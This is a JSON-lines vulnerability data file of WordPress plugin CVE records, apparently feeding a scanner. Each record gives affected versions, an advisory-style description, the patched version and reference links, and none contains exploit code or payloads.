{"CVE_ID":"CVE-2023-1430","slug":"fluent-crm","versionEndExcluding":"2.8.0","description":"The FluentCRM - Marketing Automation For WordPress  plugin for WordPress is vulnerable to unauthorized modification of data in versions up to, and including, 2.7.40 due to the use of an MD5 hash without a salt to control subscriptions. This makes it possible for unauthenticated attackers to unsubscribe users from lists and manage subscriptions, granted they gain access to any targeted subscribers email address.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899218\\\/fluent-crm\\\/tags\\\/2.8.0\\\/app\\\/Hooks\\\/Handlers\\\/ExternalPages.php?old=2873074&old_path=fluent-crm%2Ftags%2F2.7.40%2Fapp%2FHooks%2FHandlers%2FExternalPages.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899218\\\/fluent-crm\\\/tags\\\/2.8.0\\\/app\\\/Hooks\\\/Handlers\\\/ExternalPages.php?old=2873074&old_path=fluent-crm%2Ftags%2F2.7.40%2Fapp%2FHooks%2FHandlers%2FExternalPages.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de6da87e-8f7d-4120-8a1b-390ef7733d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de6da87e-8f7d-4120-8a1b-390ef7733d84?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10786","slug":"simple-local-avatars","versionImpact":"2.7.11","versionEndExcluding":"2.8.0","description":"The Simple Local Avatars plugin for WordPress is vulnerable to unauthorized modification of datadue to a missing capability check on the sla_clear_user_cache function in all versions up to, and including, 2.7.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear user caches.","recommendation":"Update to version 2.8.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2619d50-e295-4e13-91d4-f998b8aa5be4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2619d50-e295-4e13-91d4-f998b8aa5be4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.7.11\\\/includes\\\/class-simple-local-avatars.php#L1374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-local-avatars\\\/tags\\\/2.7.11\\\/includes\\\/class-simple-local-avatars.php#L1374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186674\\\/simple-local-avatars\\\/tags\\\/2.8.0\\\/includes\\\/class-simple-local-avatars.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186674\\\/simple-local-avatars\\\/tags\\\/2.8.0\\\/includes\\\/class-simple-local-avatars.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1295","slug":"templines-helper-core","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The Templines Elementor Helper Core plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.7. This is due to allowing arbitrary user meta updates. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to Administrator. The vulnerability can only be exploited when the BuddyPress plugin is also installed and activated.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/templines-helper-core\\\/youzify\\\/youzify.php#L3082\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/templines-helper-core\\\/youzify\\\/youzify.php#L3082\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c5aa062-b9a2-4ddb-a5bf-4c8368218e85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c5aa062-b9a2-4ddb-a5bf-4c8368218e85?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5099","slug":"hk-filter-and-search","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The HTML filter and csv-file search plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 2.7 via the 'src' attribute of the 'csvsearch' shortcode. This allows authenticated attackers, with contributor-level permissions and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee2b4055-8cbd-49b7-bb0b-eddef85060fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee2b4055-8cbd-49b7-bb0b-eddef85060fc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7891","slug":"floating-contact","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The Floating Contact Button WordPress plugin before 2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b584a225-0d91-464d-b1c1-15594274d9d4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b584a225-0d91-464d-b1c1-15594274d9d4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5096","slug":"hk-filter-and-search","versionImpact":"2.7","versionEndExcluding":"2.8","description":"The HTML filter and csv-file search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'csvsearch' shortcode in versions up to, and including, 2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/157eddd4-67f0-4a07-b3ab-11dbfb9f12aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/157eddd4-67f0-4a07-b3ab-11dbfb9f12aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985200\\\/hk-filter-and-search\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4791","slug":"woo-product-slider-and-carousel-with-category","versionEndExcluding":"2.8","description":"The Product Slider and Carousel with Category for WooCommerce WordPress plugin before 2.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a6e4c45-3f6d-4150-9546-141c2e3a1782\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0a6e4c45-3f6d-4150-9546-141c2e3a1782\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6250","slug":"facebook-button-plugin","versionImpact":"2.73","versionEndExcluding":"2.74","description":"The BestWebSoft's Like & Share WordPress plugin before 2.74 discloses the content of password protected posts to unauthenticated users via a meta tag","recommendation":"Update to version 2.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cad602b-7414-4867-8ae2-f0b846c4c8f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cad602b-7414-4867-8ae2-f0b846c4c8f0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0067","slug":"timed-content","versionEndExcluding":"2.73","description":"The Timed Content WordPress plugin before 2.73 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f43da9-9903-4bcf-99e8-0e269072d389\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f43da9-9903-4bcf-99e8-0e269072d389\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7498","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.9.4","versionEndExcluding":"2.7.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown Widget in all versions up to, and including, 2.7.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/exad-scripts.js#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/exad-scripts.js#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/vendor\\\/js\\\/jquery.countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/trunk\\\/assets\\\/vendor\\\/js\\\/jquery.countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326867%40exclusive-addons-for-elementor&new=3326867%40exclusive-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3326867%40exclusive-addons-for-elementor&new=3326867%40exclusive-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d3d738-5c82-4f6b-b8f3-d5af5391b6f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51d3d738-5c82-4f6b-b8f3-d5af5391b6f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1425","slug":"groundhogg","versionEndExcluding":"2.7.9.4","description":"The WordPress CRM, Email & Marketing Automation for WordPress | Award Winner \u2014 Groundhogg WordPress plugin before 2.7.9.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/578f4179-e7be-4963-9379-5e694911b451\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/578f4179-e7be-4963-9379-5e694911b451\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4783","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.9.1","versionEndExcluding":"2.7.9.2","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML attributes of the Countdown Timer Widget in all versions up to, and including, 2.7.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.7.9.1\\\/assets\\\/js\\\/elements-js\\\/countdown-timer.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.7.9.1\\\/assets\\\/js\\\/elements-js\\\/countdown-timer.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec41956f-eefc-4c8b-ade1-2a3a0f3d86df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec41956f-eefc-4c8b-ade1-2a3a0f3d86df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2017","slug":"countdown-builder","versionImpact":"2.7.8","versionEndExcluding":"2.7.8.1","description":"The Countdown, Coming Soon, Maintenance \u2013 Countdown & Clock plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the conditionsRow and switchCountdown functions in all versions up to, and including, 2.7.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject PHP Objects and modify the status of countdowns.","recommendation":"Update to version 2.7.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8fab229-cd6b-45a3-9e80-a03a1704ad3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8fab229-cd6b-45a3-9e80-a03a1704ad3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/countdown-builder\\\/trunk\\\/classes\\\/Ajax.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097588\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097588\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096150\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096150\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10114","slug":"woo-social-login","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.7.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpwebelite.com\\\/changelogs\\\/woocommerce-social-login\\\/changelog.txt\",\"name\":\"https:\\\/\\\/www.wpwebelite.com\\\/changelogs\\\/woocommerce-social-login\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3453","slug":"password-protected","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The Password Protected \u2013 Password Protect your WordPress Site, Pages, & WooCommerce Products \u2013 Restrict Content, Protect WooCommerce Category and more plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.7 via the 'password_protected_cookie' function. This makes it possible for unauthenticated attackers to extract sensitive data including all protected site content if the 'Use Transient' setting is enabled.","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-protected\\\/trunk\\\/includes\\\/compatibility.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/password-protected\\\/trunk\\\/includes\\\/compatibility.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274358\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274358\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/241d75ca-55e3-461a-9844-52e69904da1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/241d75ca-55e3-461a-9844-52e69904da1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10104","slug":"job-postings","versionImpact":"2.7.7","versionEndExcluding":"2.7.8","description":"The Jobs for WordPress plugin before 2.7.8 does not sanitise and escape some of its Job settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0a9c8ae-f2cf-4322-8216-4778b0e37a48\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0a9c8ae-f2cf-4322-8216-4778b0e37a48\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10143","slug":"mb-custom-post-type","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The MB Custom Post Types & Custom Taxonomies WordPress plugin before 2.7.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fd7a3e-33e4-4c73-a581-881f063855b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b5fd7a3e-33e4-4c73-a581-881f063855b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10400","slug":"tutor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the \u2018rating_filter\u2019 parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcf37d4e-e94a-4046-9949-c208e4e70197?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10393","slug":"tutor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The Tutor LMS plugin for WordPress is vulnerable to bypass to user registration in versions up to, and including, 2.7.6. This is due to a missing check for the 'users_can_register' option in the 'register_instructor' function. This makes it possible for unauthenticated attackers to register as the default role on the site, even if registration is disabled.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186319\\\/tutor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf8aa169-df51-46db-8c65-f1543d4f75f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11767","slug":"newsmanapp","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The NewsmanApp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'newsman_subscribe_widget' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1075\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsmanapp\\\/trunk\\\/newsmanapp.php#L1075\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205721\\\/newsmanapp\\\/trunk\\\/newsmanapp.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205721\\\/newsmanapp\\\/trunk\\\/newsmanapp.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12597","slug":"ht-mega-for-elementor","versionImpact":"2.7.6","versionEndExcluding":"2.7.7","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'block_css' and 'inner_css' parameters in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209697\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209697\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f12e75-0bb6-48ed-9ba2-17caab268d61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f12e75-0bb6-48ed-9ba2-17caab268d61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12767","slug":"buddyboss-platform","versionEndExcluding":"2.7.60","description":"The buddyboss-platform WordPress plugin before 2.7.60 lacks proper access controls and allows a logged-in user to view comments on private posts","recommendation":"Update to version 2.7.60, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8997f90-d8e9-4815-8808-aa0183443dae\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8997f90-d8e9-4815-8808-aa0183443dae\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7503","slug":"woo-social-login","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.5. This is due to the use of loose comparison of the activation code in the 'woo_slg_confirm_email_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the userID. This requires the email module to be enabled.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3b727ba-b39c-4a98-a6a6-ea33785079f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3b727ba-b39c-4a98-a6a6-ea33785079f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8724","slug":"waitlist-woocommerce","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The Waitlist Woocommerce ( Back in stock notifier ) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waitlist-woocommerce\\\/trunk\\\/admin\\\/templates\\\/xoo-wl-import-form.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waitlist-woocommerce\\\/trunk\\\/admin\\\/templates\\\/xoo-wl-import-form.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151186%40waitlist-woocommerce&new=3151186%40waitlist-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151186%40waitlist-woocommerce&new=3151186%40waitlist-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1043","slug":"embed-any-document","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The Embed Any Document \u2013 Embed PDF, Word, PowerPoint and Excel Files plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.5 via the 'embeddoc' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242370\\\/embed-any-document\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242370\\\/embed-any-document\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f8c600-d62d-4f27-ba73-1a77a63859bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f8c600-d62d-4f27-ba73-1a77a63859bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
